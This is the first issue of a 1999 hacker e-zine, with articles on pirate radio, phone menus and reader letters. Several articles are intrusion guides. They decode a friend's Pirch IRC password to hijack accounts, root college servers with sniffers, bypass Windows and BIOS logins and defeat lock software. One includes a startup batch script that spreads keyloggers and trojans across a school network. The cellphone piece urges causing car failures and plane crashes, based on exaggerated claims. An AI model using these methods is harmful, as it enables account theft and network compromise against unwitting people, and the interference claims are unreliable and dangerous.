:..:..:..:..:..:..:..:..: ::::::::::::::::::::::::: :::::::: :::::::: :::: ______ ::::: :: �/ | \ :: ::: / | \_ ::::: :::: \\ / \ :::: ::::: \______/ _ \ :: :::: / / ::: :: / ____/ :: :::: _/ /_ :::: ::::: \ / ::::: ::: \ // ::: :::::: \/ :::::: :::: � :::: :::::::...........::::::: ::::::::::::::::::::::::: :UNDERGROUND::PERIODICAL: ::::::::::::::::::::::::: "We're on the Up and Up" :..:..::..Issue..::..:..: Issue 1 March 1999 :..:..::.Editor..::..:..: Cyborg :.::..Shouts Outs To.::.: G_H fORCE GPF#2 ZirQaz Madboar Hellbent X-Crash-X LordPhaxx :..::..:.Website.:..::..: http://upzine.8m.com :..::..:..E-mail.:..::..: under_p@yahoo.com :..::..Introduction.::..: <*> Welcome to the first and thus foremost issue of Underground Periodical. The staff has been planning this e-zine for 2 whole months so we hope everyone thinks that it's good. The thinking behind Up is new wave, we wanted to create an e-zine that didn't try to be the latest thing in the hacking scene but rather an interesting read, something to make you think out loud. Our main aim is to keep on going, so many e-zines die sometime in their first five issues. I urge you to send us something to use, as you will get to plug your site at the end. <*> Its readers write Underground Periodical. Without you we the staff, the fancy ascii art, it all means nothing. You are the ones who write the magazine. What we need to get started is submissions, send us in your text files. We accept technical information, philosophy on the state of the scene today, articles on free speech and censorship we are interested in all innovations of computer culture, although we are mostly based on underground stuff. Send your articles in text format to the e-mail address at the top. <*> The Periodical is written in text format so as readable by any O/S such as Unix, Windows, Mac etc. We'd like to thank fORCE the most for designing the ascii logo and anyone who has sent us articles and/or wished us luck. The staff's number one goal is to stay afloat, a tough challenge which I accept head-on. If you don't think you would be able to write an article then why not upload Up1-01.zip to your site? You will be mentioned as an official distributor if you let us know and it will help plug your web-site. <*> As well as submissions we need more staff. If you would like your own monthly column then just send us an article and if we think it's good (and you say that you'd be interested in writing more) then you might just have earned you a regular spot in Up. The only thing is we can't accept files on the warez scene or porn as our extensive range does not cover these topics. <*> Tell your friends!!! Tell you pals on mailing lists and IRC channels about the Periodical. We post our existence to a few newsgroups but it just isn't enough. We can't be everywhere at once so advertise us to your greatest mates. If you were doing an e-zine I'd help you out. <*> We'd like to thank any and all people who submitted to Issue 1 or contributed in any way. It is understood that they are automatically included as Shout Outs. Without continued support from the h/p community we wouldn't have gotten Up off the ground. Anyway, on with this issue... :..::.:..Contents.:.::..: <*> 1 - Inroduction & Contents : Cyborg <*> 2 - Cracking Pirch32/98 : Daemon0 <*> 3 - Ten Secure Steps : Byte <*> 4 - Pirate Radio Series : Cyborg <*> 5 - Bypassing Systems : DemonR <*> 6 - BIOS Backdoors : Nommo <*> 7 - NEC p800 Mobiles : HitMan <*> 8 - Security Programs : Cyborg <*> 9 - Letters\Feedback : Readers <*> 10 - Disclaimer & The End : Cyborg :..::..End Of File..::..: :..::..File 2 of 10.::..: :..Cracking Pirch32/98..: :..::...By Daemon0..::..: <*> AIM: Have you ever wanted to go on IRC under your friend or enemy's nick but didn't know their password? Today my friend you can learn how to change that. Obtaining The Password File Your victim must be using pirch either v 32 or 98. The password and other info that pirch uses is stored in a .ini file in the pirch dir i.e c:\pirch98\pirch98.ini. There are many ways in which you can obtain this file the ones i can think of off the top of my head would be go to the victims house and copy the file on a disk and tell him/her some bullshit excuse why you need it OR you could use NetBus or Back Orifice to get it or you could try some social engineering and try to get him/her to dcc it or whatever. Finding The Encrypted Password Open The .ini File and look under [user] here you will see there nick, email address etc. look for the line beggining with "pw=" here is where the Encrypted password is in my example below it would look like: pw=����� copy this line in the .ini and move on. Encryption Below is a list of all characters and its Pirch Encrytption: lowercase alphabet ---------------------------------------------------- a b c d e f g h i j k l m n o p q r s t u v w x y z � � � � � � � � � � � � � � � � � � � � � � � � � � ---------------------------------------------------- UPPERCASE ALPHABET --------------------------------------------------- A B C D E F G H I J K L M N O P Q R S T U V W X Y Z � � � � � � � � � � � � � � � � � � � � � � � � � � --------------------------------------------------- Other Characters, note: the ! character is a space when encrypted into ( pirch language ) ie its just a blank space in the encrypted password field in the .ini file. -------------------------------------------------------- !"�$%^&* ( ) _ + < , > . ? / : ; @ ' ~ # { [ } ] \ - ` | �"��ݥ� � � � � � � � � � � � � � � � � � � � � � � � � -------------------------------------------------------- Numbers -------------------------------------------------------- 1 2 3 4 5 6 7 8 9 0 � � � � � � � � � - -------------------------------------------------------- Cracking The Password Ok so now you have the encrypted password all you have to do is compare each encrypted character to the ones beneath the english characters and from there match up the english character, so if the encrypted password is ����� then I will match them up. � = h � = e � = l � = l � = o So the real password is "hello", its not that hard. From past experience i have noticed that alot of people use the same password for everything like IRC, E-mail, ISP account etc. I managed to log into my freinds e-mail and ISP using his IRC password, so experiment. Thats it for just now if you have any problems e-mail me at: mike@rainz.freeserve.co.uk --Daemon0 :..::..End Of File..::..: :..::..File 3 of 10.::..: :..:.Ten Secure Steps.:.: :..::.:..By Byte..:.::..: <*> Byte --- byte@cork.crosswinds.net This is an idea on how to learn more about security, if you rush these steps, you will be just fooling yourself, IT WILL TAKE TIME, the sooner you face that the less mistakes you will make. 1. Get a UNIX O/S, Linux is the best to start with, however after time you will soon find many drawbacks, but its a very good start to a UNIX o/s. 2. Mess about with localhost, basically teach yourself to be an admin, install patches and secure your own box. 3. Find out about networking, get a PPP Internet account if you are interested in hacking things on the Internet. While your are doing this learn more about networks, services routers daemons. 4. Use IRC, something like using Undernet and going to #hackphreak is a good start, dont ask things like, how do I have a .mil or how can I rip off my friends credit card. 5. Now getting one or two ORA books would really help you on your ways. Read man pages and just make sure you know your way around a UNIX box like you've known it all your life. 6. At this point, learning how to program is very useful (but not essential) Pascal is easy to learn and will help you understand programming, however C is OK to learn and you can use it in your hacking, you wont be able to use Pascal. 7. Now move to Free/Open/Net BSD, which are allot closer the real UNIX O/S. Solaris, since it is free now, is also a good option. 8. Go get all the papers you can find, not just hacking ones, but ones on security, http://www.rootshell.com and go to the papers section. Read them all and MAKE SURE YOU UNDERSTAND them. Subscribe to Bugtraq. 9. By now you may well know enough to hack, go find some host on a collage, just as a test of your skill, try and find out everything about it, this would mean doing traceroutes hacking it and installing passwd sniffers (which is very useful) and logging processes. 10. Now use the sniffer log and get root on other boxes. If this all went well (and undetected) you may now have root on every server in the collage. NOTE: Never fuckup any servers (unless its a kkk or the www.rotten.com server or something like that). Its lame and some sys admin probably spent endless nights to have the server in working order. To be continued........................ Please feel free to email me :..::..End Of File..::..: :..::..File 4 of 10.::..: :..Pirate Radio Series..: :..::...By Cyborg...::..: <*> Pirate Radio Series Part I Introduction: This file deals with starting your own pirate radio station. It is a part one of a four part series on pirate radio. I've researched many sites on the internet combine with my own knowledge to write this file. Getting Started - Building A Production Studio Unless you plan to broadcast some sort of pre-produced programming, or plan to rebroadcast other pirate radio stations, chances are you will need to put together your own material for broadcast. In this section I will mention some of the ways you can build a production studio that will serve your particular needs. A production studio does not need to be something you might see at a commercial radio station, all those soundproof screens and such are not necessary. I'll assume for now that you will be preparing pre recorded material for broadcasting at a later time. Much of this material will also apply to a live setup. As far as content goes, you could use anything your imagination can conceive. To prepare a taped program, all you need is a way to record on the tape, this can be a small pocket tape recorder. You can simply record your message and use the pause control to perform minor edits. After you have completed the messages the recorder can be connected to the transmitter and the show played back over the air. Most pirates want more creative freedom than this, some pirate stations have studios that rival commercial setups, as you grow with the pirate radio hobby it is likely that your studio will also grow. It is almost always a good idea to start small and improve your setup as you need to, don't get too anxious and spend all your money buying equipment unless you can't operate without it. One of the first additions that are made to a pirate studio is a mixer. A mixer is a device that allows you to connect the outputs of various components (such as turn tables, CD players, tape decks, microphones, etc) to its input. The mixer's output is then connected to the input of a tape recorder. The mixer combines these signals and allows you to vary the volume of each signal. This facilitates talking over music, fading from one source to another, and gives you infinite control over all of your audio levels. A mixer can add a professional sound to any studio. Now that you have built your studio and made your first program, it is time to broadcast it for the world to hear. One obstacle still remains: how do you get the audio from the tape deck to the input of the transmitter. Much of this will depend upon the type of transmitter you have chosen. In most cases the audio source from the tape deck will replace the microphone on the transmitter. This is one reason it is a good idea to have to manual for your radio. It will likely be necessary to wire the output from your tape recorder to a plug that fits your radio. This may include a switch to enable and disable the push to talk function of your radio. Since this varies widely from radio to radio I can only refer to this in the most general terms. If you are not electronically inclined, you should find a friend to help you with this. It is not a difficult task on most radios. - Producing A Show What you decide to put on the air is only limited to your imagination, maybe it please you to produce a h/p related show with the latest info from hacker news websites or playing DTMF tones over the air. One of the greatest aspects of pirate radio is that it isn't censored by companies paying advertising fees or governmental agencies. What you decide to put out there is your choice as an individual, remember that. Once you have set up your studio and decided it is time to produce a show, you will likely have a certain subject matter or format in mind. If you don't, then take some time and review why you wanted to be a pirate in the first place, was it to make a certain point or political view, do you want to entertain or inform, do you just want to play your favorite music, or do you want to do all of the above? In most cases you will be successful at anything that you enjoy doing. Here are some general tips: * ID your station often Speak clearly and repeat your ID. It also helps to have different people give your station ID; some voices are easier to understand through the noise than others. Regular listeners need something they can identify with. A short witty name which sounds easy to remember is what I suggest. Also, some stations always play the same song at the beginning or end of their broadcast. * When editing a tape, make the edits clean and tight Long pauses are always a killer. However some tapes cut a couple of seconds off the start so begin with a pause. If you are recording to a cassette tape, and you have a good recorder, you can use the pause control to make fair edits but be sure to go back and check the edits often, most decks are designed with the erase head placed up to an inch away from the playback head, this can create a longer than desirable pause. Practice editing with your tape recorder first. * In most cases it is wise to avoid live broadcasting To broadcast live and sound good is a VERY difficult thing to do. This is not to say it cant be done, many stations have the talent and experience to do it well. However, others do it and it is disastrous. Live broadcasts can result in lots of dead air; if you encounter a problem you will have to be prepared to solve it while maintaining a live show in the air. If you tape your shows you will have time to review what you have done and redo it if needed, you can take as long as you like to think of what to say next and you will almost always sound better. * Ground your studio equipment and use shielded cables Do this to prevent audio "hiss" and equipment "hum". Use quality recording tape (you get what you pay for). Use quality audio input, avoid scratchy records and bad tapes, If you use a poor quality microphone your audio could sound "muddy" or "tinny", good mikes aren't always expensive. Look out for Part II of this series where I will discuss transmitters and going on the air. Well I hope this has been an informative read. If you would like to e-mail me regarding anything in this file then go ahead. If you are interested in hacking, phreaking or programming then e-mail me or visit my website: cyborg@disinfo.net http://cyborg.ie.8m.com :..::..End Of File..::..: :..::..File 5 of 10.::..: :.:.Bypassing Systems.:.: :.:.::..By DemonR..::.:.: <*> File: General info on breaking into local systems About: Mainly focuses on Windows 95, 98 and NT. <*>------------------------------<*> Well well, you've got a system sitting in front of you... but you cant access it all? Oh well, this likkle file might help. *** Windows 9x First the passwords in 9x are so easily gotten past that most system admins will use some sort of proggie to stop you doing stuff. However if you can get past the admins password then, well you can guess, and well its easy. General Aim:- Your aim is 1 of 2 things, 1- Rename c:\windows\admin.pwl to something else 2- Gain write access to c:\windows\system.ini Why? Pretty simple realy, if you rename the file well windows doesn't cop on and it asks you to enter a new password. Doh! The secong method is the same principal , stores the name of the <.pwl> file, so if you tell it the is it wont find it and ask you to enter a password. How? Well the main way would be to boot into either DOS mode or Safe mode. From there all the restriction programs have no effect so you can roam at will. To boot into safe mode, you can either hold shift down at the start up, or press F8 just before it says Starting Windows 9x. That gives you a menu from which you can choose safe mode. Once in safe mode you can go to the run in the start menu and then type in: and then edit it (see later in the file). To boot into DOS mode its pretty much the same, 2 common methods, one press F8 and pick and it boots up into DOS mode, the other way is to put in a boot disk before it boots up. It should boot up in DOS mode. Once there type in: Now what? Well once you've got then all you have to do is search for the password. You should then see something like this [Password Lists] NOBODY=3DC:\WINDOWS\NOBODY.PWL ADMIN=3DC:\WINDOWS\ADMIN.PWL ANYONE=3DC:\WINDOWS\ANYONE.PWL Well all you have to do now is change the last bit so it looks like this: [Password Lists] NOBODY=3DC:\WINDOWS\NOBODY.OLD ADMIN=3DC:\WINDOWS\ADMIN.OLD ANYONE=3DC:\WINDOWS\ANYONE.OLD Or whatever suits your mood. Just remember the original names so you can restore them after your fun, as to not raise suspicion. Alternately you can, when in DOS, (if your in windows in safe mode simply type in in the run box) you can type in: and that should do it. Problems: Well you could encounter some problems 1- F8 wont work?? Well the admin has probably changed a line in msdos.sys which disables this key during boot up, use a boot disk instead. 2 - Boot disk wont work?? The admin has probably disabled the availibilty of booting from floppy in the BIOS. Well then try the F8 key or holding Shift down, if that doesn't work well there is one thing you can try... The BIOS: Well usulay it says how to get into the BIOS on the startup something like: Press Del to Enter Setup Or Press F* to Enter Setup Well just do as it says. Although I have seen some compaqs cover up the screen which tells you which button to press, so just try F* or Del etc. If you get in without a password well you can change where the machine boots up from, usualy you pick from a sequence, e.g C, A, SCSI or A, C, ZIP. You want the A first, ie the floppy drive. P.S careful of the BIOS it can fuck up stuff easily. *** Windows NT Well its way more secure than 9x, but thats not hard. Its still possible to break into NT. Unlike 9x, in NT you actully have to crack the passwords and not just rename them. So first you have to get them... There are a few programs availible for dumping NT passwords from the registry. e.g L0phtcrack, or NTdump which is availble from my site . But theres a problem about that... you need admin status to gain access to the registry, hmmmm. How do u get admin status? well of course there are exploits availible, from my web site, and loads of other places :-) which lets guests have admin status. Once an admin, you can dump the passwords from the registry and crack them using NTcrack, or l0phtcrack, the second is better, as it has everthing combined into one. I can't get admin status :-( Well... there is a program going around that is hard to find, but once you have it, you can do anything. its called NTFSDOS.exe and what it lets you do is have access to the NT drive from DOS. so you can boot up of a DOS floppy and run this. And since it is accesses the drive, it ignores the file permissions... and you can get the registry file or the password file... and then just crack it. Network stuff. If your school or whatever has a network. when you get admin status you can wreak havoc on the network. e.g. Usualy the server has a drive mapped on every machinge e.g I:\ or something. Well. Say you put a program on every machine you go to. Just a small batch file. You put in the start up. and what the program does is. runs a program on the mapped drive. Then you can update all your trojans, key loggers etc remotely, hahaha for e.g You have every machine (or most) running a file called update.bat every time they start up. Update.bat could be: @echo off copy I:\winnt\system\net5.dll c:\ ren c:\net5.dll c:\updateme.exe updateme.exe > nul <--------- The > nul means it doesnt del /y c:\updateme.exe print anything on the screen. Well then you make a program to install your newest key logger, go to the file server and put it on the i: drive under the name net5.dll of course you have to have access to the main machine, but if you can get the password file etc. and you have admin status the its easily done. Some machines let you write to them as guest so take advantage of this. Its possible to control *your* network with just batch files. Ask GPF#2 :-) he did it... Well the above info isnt very exact, but hopefully you will take the initave to work out how break into networks etc from the above. demonr@Phreaker.net http://newbiehack.8m.com :..::..End Of File..::..: :..::..File 6 of 10.::..: :.:...BIOS Backdoors..:.: :.::.:...By Nommo..:.::.: <*> By now you should all know that BIOS passwords are not exactly top-security. BIOS password crackers are nice little utilities, and might be handy if you are lucky enough to actually be inside the system, but how do you get inside it in the first place? Luckily, the stingy BIOS manufacturers have implemented backdoor passwords to save money when people phone up telling them that they've forgotten their password, so all they have to do is to type in these special codes, and they will get through the password screens and can change their old password. BIOS passwords will keep those honest people out but provide no protection against dishonest (I'd rather say curious) ones. Ahem. On to those codes: I will only give you the most common manufacturers' backdoors, for others, have a search on the 'net. NB. These are all case sensitive, so type carefully. And when you're finished, don't change the original passwords for the user, that's plain lame... AMI BIOS: --------- AMI AMI_SW AMI?SW A.M.I. BIOS HEWITT RAND LKWPETER PASSWORD 589589 (AmiBIOS 4.5x) AWARD: ------ 589589 589721 ALFAROME aLLy AWARD_SW AWARD_PW AWARD?SW awkward BIOSTAR j256 j262 HLT lkwpeter LKWPETER SER SKY_FOX Syxz <-Nice Others: ------- Phoenix also have backdoors - can't remember them off-hand. Can't remember what these work for, but try them out if desperate: condo, djonet, lkwpeter, biostar, biosstar IBM Aptiva's can be cleared by holding down both mouse buttons at boot-up until the computer boots. Toshiba laptops can bypass the password by holding down the left shift key during boot-up. If none of this works, on some computers, flooding the keyboard buffer will crash the password routine and allow the computer to boot. That means you keep hitting ESC at the password prompt. This may require 50 to 100 presses, and may not work in all machines, but its worked before, and is worth a try. The other method is to short the jumper on the motherboard by touching both the wires together for about 10 seconds. Some motherboards get damaged if you do this when it is on, so I suggest you do it with the computer turned off. Remove the jumper, turn the puter on, then if that fails then turn the computer on with the jumper in place. This will clear ALL the CMOS settings, so only do it when in dire need or when you know all the correct CMOS settings and have them written down. Better safe than sorry! From this, I hope you have learnt that BIOS passwords aren't exactly the safest thing in the world! If one person learns one thing from this article then i have done my job! Laters, Nommo thenommo@mailcity.com http://UphreaK.8m.com Other texts by meself: How to get around school proxy servers - An overview and several methods :..::..End Of File..::..: :..::..File 7 of 10.::..: :.:..NEC p800 Mobiles.:.: :.::.:..By HitMan..:.::.: <*> My expertise in the cellphone area is not by any means excellent and I am not for one moment saying it is but I do insist that if you have a mobile lying around the house that you should do as much damage as possible and that includes becoming a maniac so far as creating explosions and causing plane crashes so have fun. Just some of the best fun can be done right in front of your house even in places that you thought where 100% free of danger, because now you have just interupted them in a way they will not forget. In an auto- mobile you can fuck it up by turning on the moblie phone and causing your anti-skid breaks, your speed control and your fuel injection to become dead as if they never ever powered up. On an aircraft you also interfere with it's much needed resources and causing the plane to go a couple of thousand degrees off course by interfering with the navigation system. It would also be fun when an area tells you to "turn off two-way radio" and to ignore it, causing major damage as you ignite a shitload of chemicals KA-BOOM! Of course i'm by no means saying you should go out and do this as if you do it would be your own choice. What i am saying is by doing this you are putting a lot of lives at risk so just don't do something you're going to regret in later years when your being fucked up the ass by your cellmate. Here's a quick guide to most phones O/S but as always i have based this on my phone and some others may vary in their own ways, This I based on the NEC p800 and some features may not work in different countries. The screen would look like this: ---------- |***** | * = Bat level | 11:30AM| = Time |Wed 24 Jan| = Date | EIRCELL | = Selected network ---------- :..Function summary..: :..Keystrokes............Effect.. :..F(briefly) Display battery level or display phone number :..F(hold) Display higher digits of a long phone number, or display first menu item :..F(hold) in car kit To switch between handsfree and handset :..F0 Insert pause :..F1 Timer readouts :..F21 Set clock and calendar :..F22 Set alarm and automatic power on/off :..F23 Set 12hr/24hr format :..F41 Set ring tone volume :..F42 Set ring type :..F43 Set keypad tone volume :..F44 Set DTMF tone length :..F51 Set auto-answer (car) :..F52 Set external control (car) :..F61 Clear recent call data :..F62 Set auto-lock :..F63 Set international call barring :..F64 Set memory lock :..F65 Change lock code :..F66 Reset phone to original settings :..F67 Set maximum credit units (if programmed) :..F68 Set PIN :..F71 Set power-on message :..F72 Set battery saving :..F73 Set display language. :..F74 Set network :..F8 Set microphone mute :..F8(hold) Set line hold (during call) :..F M+ Set or realse keypad lock As I have already said these are for a NEC p800 so if they don't work on your phone you can go out and buy one so that they do work. [-=HitMan=-] vectra500@geocities.com http://hitman.ie.8m.com :..::..End Of File..::..: :..::..File 8 of 10.::..: :.:.Security Programs.:.: :.::..:.By Cyborg.:..::.: <*> Introduction: This file deals with security programs and how to beat them. These are just the easy ones of course. Security programs with elaborate encryption schemes will not be covered. However, it may prove useful to know flaws in common programs. Program #1 - Winlock This program locks out key security functions to Windows and can only be turned off with the password. When faced with the password prompt type WINLOCK in all capital letters and then press OK. This is the default password and works all the way up to v 5.0 as far as I know. Failing this, try to corrupt the EXE by opening it in Dos Edit and deleting characters all over the place. This might crash the system but it's a good last gasp attempt. Program #2 - Desktop Surveillance This program records what you have been doing. Not keystrokes mind you, and exact playback of your screen. It doesn't have a password feature though. You are not supposed to know it is there. Press CTRL+ALT+DEL to view the task list. It is named Osa. Doesn't sound like a surveillance program does it? Well "End Task" all the same. If your boss/parents is suspicous about it just closing you might try writing a small program to feign an illegal operation in explorer. When that crashes all existing windows and programs will close. The last thing seen on the playback will be an error message. Program #3 - IconLOC This program puts a password lock on icons. Going to an EXE through RUN does not overide. It is actually a lock on the program unlike the title. If you want to know the password in the unregistered version simply right click, than go to properties, then the shortcut tab and you will find it in the command line between the IconLOC path and the shortcut path. If you need to know more than just the last password then you might be interested in a program I coded in Visual Basic last November called Trickster. Everything about it looks like IconLOC in every way except when you enter the passord and press OK it saves the password to the clipboard viewer. If anybody wants it just e-mail me. Program #4 - Keylog 98 This is actually a monitoring program. It records your keystrokes. It is great for finding passwords but not so great when somebody is running it on you. To throw you off it is listed on the Task List as Dllman32 so that it looks like a DLL manager, too important to be messing about with. Press "End Task" to close. The logs are stored in the following directory: c:\windows\system\97x\ That's if you need to recover logs or want to erase past entries. The logs are so muddled up that no-one will be able to tell any difference when it comes to closing it or omitting log entries. Program #5 - Serv-U This program runs a temporary FTP server on your PC and there is a certain command which can be pretty harmfull... First, (in DOS) log in with localhost as "anonymous" user, then type: ls- lga c:\autoexec.bat and it over-writes the autoexec.bat with the list of files in the dir. Now keep in mind the c:\autoexec.bat files are meant to be unreachable. This works even when the only access you are supposed to have is to upload to the upload dir. Program #6 - Foolproof This program can block access to certain directories in the system by "intercepting interrupt 13h". To access any of the protected directories, simply go into any Office 97 application and go to the Macro Editor. From there, you can use the CopyFile command, Kill (to delete files), or any other file operations. This allows you full access to the file system. Foolproof can also disable every application in the system except for specified ones that are set in the control panel. To bypass this protection, use macros to overwrite an allowed application, such as Publisher 97/98. Then, you run the application through the shortcut that you usually run Publisher from. Program #7 - Lockdown 2000 This program claims "total security". Unfortunately it cannot deliver on it's promise. First run boserve.exe. I know that BO is lame but it is worth publisising bugs to encourage the development of better software. Lockdown spots a BO server. Now choose to reboot the machine to remove the trojan. On reboot, the trojan check again finds the BO server and shows the same warning, and the same promise of removal and recommendation to reboot. But it has not been "removed from Windows start-up." Now run Regedit and in the Lockdown directory you will see two keys " .exe" and "Removed By Lockdown2000". As you see, the Back Orifice " .exe" command remains where it is, untouched, and Lockdown has added a false gloat of victory to the Registry. Well I hope this has been an informative read. If you would like to e-mail me regarding anything in this file then go ahead. If you are interested in hacking, phreaking or programming then e-mail me or visit my website: cyborg@disinfo.net http://cyborg.ie.8m.com :..::..End Of File..::..: :..::..File 9 of 10.::..: :.:..Letters\Feedback.:.: :..::...By Readers..::..: <*> This is the part of the e-zine where we respond to e-mails and questions and stuff. Most of the mail we have recieved so far is in response to newsgroup posts and from people who have seen the website. The original mail headers have been left in as we aren't going to protect people who send us lame messages. Keep those intelligent e-mails flowing in. Everybody likes a bit of encouragement. The e-mails are indexed in order of the date they were recieved. :..::..Convince Me..::..: From: "NoPhun" To: Subject: SV: h\p e-zine I have written some stuff , and if I send them to you , whats in it for me ? Information wants to be free , I know . I might send you my article on hacking win9* (from the outside and the inside) but it's kind of a file for beginners . Tell me if you want it . >Submit!!! Submit!!! Submit!!! > >We NEED files!!! I myself will be writing files >but Up e-zine cannot survive without articles. >If you have written any text files then please >submit them. Send articles to: zengus@yahoo.com <*> <*> <*> <*> <*> <*> Let's just get this straight... You want some sort of prize because you might send us your article on hacking Windows for beginners. How about instead you never e-mail us again. Nobody else asked for something. Why should you feel special. You should help spread knowledge. You really are NoPhun, just some boring dude on the net. :..::...Ascii Logo..::..: From: "/" Reply-To: "/" <@btinternet.com> To: Subject: Re: h\p e-zine >Date: 27 January 1999 18:56 >Subject: h\p e-zine i doubt i can help you article wise with your ezine coz i am already involved with another zine (FAiTH MAG) but i had an ascii art which i adapted to suit your zine you might wanna use it for whatever just mention it was by me :) good luck with the zine fORCE :..:..:..:..:..:..:..:..: ::::::::::::::::::::::::: :::::::: :::::::: :::: ______ ::::: :: �/ | \ :: ::: / | \_ ::::: :::: \\ / \ :::: ::::: \______/ _ \ :: :::: / / ::: :: / ____/ :: :::: _/ /_ :::: ::::: \ / ::::: ::: \ // ::: :::::: \/ :::::: :::: � :::: :::::::...........::::::: ::::::::::::::::::::::::: :uNDERGROUND::pERiODiCAL: ::::::::::::::::::::::::: ---- "the voodoo who do what you don't dare do people" <*> <*> <*> <*> <*> <*> That is a reply we got from a newsgroup post. We'd like to thank fORCE again as he took it upon himself to design the logo without previously knowing us. You can d/load FAiTH e-zine at http://darkcyde.8m.com/faith :..::...Text Files..::..: From: "James Truncellito" To: Subject: hey man go here there are text files comin out the ass on here, and if you need any help with the zine let me know Attachment Content-Type: application/octet-stream name=Shortcut to Library of Information.URL Content-Disposition: attachment filename=Shortcut to Library of Information.URL Content-Transfer-Encoding: base64 <*> <*> <*> <*> <*> <*> Please don't send us URLs of places where we can illegitimately steal other people's text files. The articles must be submitted by the author or else it defeats the whole purpose. If you want to help us out you should write us an article. :.::..Do It Yourself.::.: From: Der angry gottchman To: zengus@yahoo.com Subject: Re: Underground Periodical On Sun, 7 Feb 1999 zengus@yahoo.com wrote: > Hey all, > > It's Cyborg here. The editor of the > Undeground Periodical e-zine. Anyways, > we still don't have enough articles > submitted to put out Issue 1. > > So if you have some text files on > your site or you were thinking about > writing a file then please send us > stuff at: > > cyborg@disinfo.net > > It would be really helpful plus you'd > get to plug your site at the end of your > article, so come on, whadda ya say? > > Cyborg > Ever considered writing something on yer own? Gottfred has a sheep <*> <*> <*> <*> <*> <*> Maybe if you didn't bug us with your pointless and stupid e-mails we'd be able to get some work done! :..::.:..Op Codes.:.::..: From: addou omar <"Gebruikersnaam@wxs.nl> Reply-To: "Gebruikersnaam@wxs.nl To: webmaster@upzine.8m.com CC: under_p@yahoo.com Subject: Op codes in mIRC Do u know some tricks, cheats or codes to in mIRC. Thanks Countdown <*> <*> <*> <*> <*> <*> There are no secret codes in the mIRC client that give you ops. Did you get confused with Quake when you asked for cheats? Turn off your computer and go do something in real life for a change. :..::.:.::.IRC.::.:.::..: From: "Felix Harris" To: zengus@yahoo.com Reply-to: felixh@netcomuk.co.uk Subject: Underground Periodical I dont know much in the way of hacking, but I know quite a lot about IRC, and how to keep and take channels. Plus other IRC related things Felix Harris felixh@netcomuk.co.uk Website down temporarily <*> <*> <*> <*> <*> <*> Ok. We would be very interested in an IRC file as it would show that we go beyond just hacking files. You can reach me on Dalnet IRC network: /msg memoserv send Cyborg^ :.::..Happy To Help..::.: To: zengus@yahoo.com Organization: AOL http://www.aol.com From: empire3219@aol.com (Empire3219) Subject: Re: Underground Periodical >Hello, > >I'm Cyborg, the editor of an upcoming e-zine called Underground >Periodical. >Unfortunately, we don't yet have enough articles for Issue 1 so I am >appealing to newsgroup readers of the underground to send us original >text files about Hacking, Phreaking, IRC, Virii, Free Speech and >more... > >We hope that this e-zine will be around for a long time and I will >announce >it's release on these very same newsgroups when it comes out. Our main >aim for the future is not to die out, to keep on going. To do that the >people >who read it will have to write it, by that I mean reader submissions. >I will >look forward to reading the replies... I'm interested in helping you out and contributing to your e-zine. However, since I publish a catalog and we are in print, I'm short on time at the moment. Hell, I still have the web site to finish. If you have any guidlines that need followed, let me know. Empire3219@aol.com or Grendel_3219@yahoo.com <*> <*> <*> <*> <*> <*> The only guidelines you need follow are no pornography or warez. We are also aiming this at the global community so try not to limit the file to just America or just the AOL network. Hope your catalog works out. :..::...Newsletter..::..: From: "Maillist" To: Subject: Newsletter If you're creating a mailing list, I'd like to be added. maillist@bhic.net <*> <*> <*> <*> <*> <*> How many times must this question be answered!?! Up is an e-zine, NOT a newsletter nor a mailing list. Just bookmark the website and check back every month to download the latest issue. :..::..End Of File..::..: :..::.File 10 of 10.::..: :..::.:.Disclaimer.:.::.: :..::...By Cyborg...::..: <*> Use this information at your own risk. Staff or contributors to Up, nor the persons providing this e-zine, will NOT assume ANY responsibility for the use, misuse, or abuse, of the information provided herein. The previous information is provided for educational purposes ONLY. The informaion is NOT to be used for illegal purposes. By reading this e-zine you ARE AGREEING to the following terms: I understand that using this information is illegal. I agree to, and understand, that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Up staff, contributors, or anyone that provided this e-zine. I understand that this information is for educational purposes only. Thanks for reading. ________ __ __ ______ ______ ___ __ ____ |__ __| | | | | | ___| | ___| | \ | | | _ \ | | | |_| | | |__ | |__ | \ | | | | | \ | | | _ | | __| | __| | |\ \| | | | | | | | | | | | | |___ | |___ | | \ | | |_| / |__| |__| |__| |______| |______| |__| \___| |____/ :..::..End Of File..::..: